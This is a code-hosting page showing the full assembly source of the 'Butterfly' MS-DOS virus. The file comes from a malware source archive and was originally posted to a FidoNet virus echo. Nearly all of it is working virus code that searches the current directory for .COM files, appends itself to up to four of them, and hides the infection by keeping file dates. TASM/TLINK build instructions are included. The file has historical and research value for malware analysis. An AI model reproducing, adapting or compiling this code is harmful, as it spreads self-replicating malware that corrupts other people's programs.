ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
6332d7096f
MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.vir61.asm

219 lines
7.8 KiB
NASM
Raw Normal View History

Add files via upload
2021-01-13 00:07:35 +00:00
;<3B> PVT.VIRII (2:465/65.4) <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> PVT.VIRII <20>
; Msg : 51 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : BUTTRFLY.ASM
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;.RealName: Max Ivanov
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: <20><><EFBFBD><EFBFBD>p<EFBFBD><70><EFBFBD><EFBFBD><EFBFBD> <20> <20><>p<EFBFBD><70><EFBFBD><EFBFBD>)
;* From : Hans Schotel, 2:283/718 (06 Nov 94 17:56)
;* To : Fred Lee
;* Subj : BUTTRFLY.ASM
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Hans.Schotel@f718.n283.z2.fidonet.org
Comment|
************************************************************************
Virus Name: Butterfly Virus
Effective Length: 302 bytes
Disassembled by Silent Death - 1993
Notes:
- Non-Resident .COM appender
- infects up to 4 files in the current directory
- infected files have 01h as the 4th byte
- ok virus to learn off of but a lot of wasteful code
To Compile: [Byte matchup!]
TASM /m File.asm
TLINK /t FILE.obj
************************************************************************|
.model tiny
.code
org 100h
start:
jmp virus
nop
nop
oldjmp db 0cdh ; int 20h
newjmp db 20h
db 90h ; nop
id db 1 ; infection marker
virus:
call delta ; get delta offset
delta:
pop bp
sub bp,10Bh ; adjust delta offset
mov di,100h ; move bytes to the start
lea si,[bp+oldjmp] ; original starting
mov cx,4 ; move four bytes
cld ; clear direction flag
rep movsb ; move the bytes
mov ah,1Ah ; set dta
lea dx,[bp+dta] ; set into heap
int 21h
mov byte ptr [bp+offset counter],0 ; reset counter
mov ah,4Eh ; find first asciiz file
lea si,[bp+dta+1eh] ; points to fname in dta
lea dx,[bp+fspec] ; files to find (*.COM)
push dx ; save file spec
jmp short findfiles
returntohost:
mov ah,1Ah ; set dta
mov dx,80h ; to original position
int 21h
xor ax,ax ; clear all registers
xor bx,bx ; no real need to
xor cx,cx
xor dx,dx
xor si,si
xor di,di
mov sp,0FFFEh ; adjust stack pointer
mov bp,100h ; return to here
push bp
xor bp,bp ; clear this
retn ; return to host
closeup:
or bx,bx ; is handle 0?
jz findnext ; yup so don't bother closing
mov ch,0 ; get attributes
mov cl,[bp+dta+15h] ; theres no point!
mov ax,5701h ; set files date/time
mov cx,word ptr [bp+dta+16h]; get original time
mov dx,word ptr [bp+dta+18h]; get original date
int 21h
mov ah,3Eh ; close file
int 21h
xor bx,bx ; delete handle
findnext:
mov ah,4Fh ; find next file
findfiles:
pop dx ; get filespec
push dx
mov cx,7 ; all attributes
xor bx,bx ; make sure no handle
int 21h
jnc infect ; jump if file found
jmp returntohost2 ; no files found then quit
vname db 0FFh
db 'Goddamn Butterflies' ; YA Know!
db 0FFh
infect:
mov dx,si ; dx => fname in dta
mov ax,3D02h ; open file read/write
int 21h
jc closeup ; if error close up, get another
mov bx,ax ; handle to bx
mov ah,3Fh ; read from file
mov cx,4 ; four bytes
lea dx,[bp+oldjmp] ; save here
int 21h
mov ax,word ptr [bp+dta+23h]; get end of filename
cmp ax,444Eh ; is file command.com?
je closeup ; yup so leave it
cmp [bp+id],1 ; is file infected?
je closeup ; yup so leave it
mov ax,word ptr [bp+dta+1ah]; get file size
cmp ax,121 ; is file smaller than 121?
jb closeup ; if it is leave it
mov ax,4202h ; file pointer to end
cwd
xor cx,cx
int 21h
cmp ax,64768 ; is file to big to infect
ja closeup ; if above then jump
mov [bp+data],ax ; save file size
lea dx,[bp+oldjmp] ; buffer to write from
mov cx,4 ; 4 bytes
mov ah,40h ; write oldjmp to end of file
int 21h
lea dx,[bp+virus] ; start of virus
mov cx,12Ah ; write virus (298) to end
mov ah,40h ; write to file
int 21h
mov ax,4200h ; file pointer to start
cwd
xor cx,cx
int 21h
mov ax,[bp+data] ; get the file size
inc ax ; increment the file size
mov word ptr [bp+newjmp],ax ; save the new jump
mov [bp+oldjmp],0E9h ; new jump
mov [bp+id],1 ; infection marker
lea dx,[bp+oldjmp] ; new jump
mov ah,40h ; write new start
mov cx,4 ; four bytes
int 21h
inc [bp+counter]
cmp [bp+counter],4 ; has 4 files been infected?
jae returntohost3 ; yup so return to host
jmp closeup ; close current file
returntohost2: ; This is a total waste!
mov di,100h ; start of file
cmp word ptr [di],20CDh ; are we the original
je returntohost3 ; yup
returntohost3:
jmp returntohost
fspec db '*.COM',0 ; files to find
dta db 43 dup (0) ; holds dta
counter db 0 ; holds file counter
data dw 0 ; holds new jump offset
end start
;-+- Concord/QWK O.O1 Beta-7
; + Origin: Data Fellows BBS (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; <20> The Me<4D>eO
;
;/L Specify library search paths
;
;--- Aidstest Null: /Kill
; * Origin: <20>PVT.ViRII<49>main<69>board<72> / Virus Research labs. (2:5030/136)
Reference in New Issue Copy Permalink